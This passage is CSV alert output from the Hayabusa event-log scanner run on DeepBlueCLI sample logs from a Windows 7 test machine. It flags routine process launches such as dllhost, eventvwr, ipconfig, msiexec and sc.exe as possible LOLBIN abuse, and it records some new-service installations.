Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:03:18.108 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 05:48:41.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 05:49:01.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 05:50:48.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 05:51:10.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:09:04.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:09:04.174 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:15.295 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:16.100 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:16.210 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:29.568 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:11:35.821 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:12:06.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 09:12:06.951 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:06.516 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:07.012 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:07.725 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:07.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:09.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 00:54:28.302 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 01:12:27.928 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 01:12:27.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 01:18:44.431 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 01:18:44.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:01:48.411 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:01:48.594 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:01:48.666 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:03:48.398 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:09:30.260 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:09:39.134 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:10:01.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:26:02.115 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:00:10.327 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:05:18.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:06:54.664 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:06:54.679 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.691 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.743 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.761 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.809 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:46:10.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:46:27.488 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:46:27.704 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:47:09.257 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:47:09.370 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:01.641 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 
29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:09.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:18.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.355 +09:00,IE10Win7,7045,info,,New 
Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:48:20.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.416 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:48:20.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | 
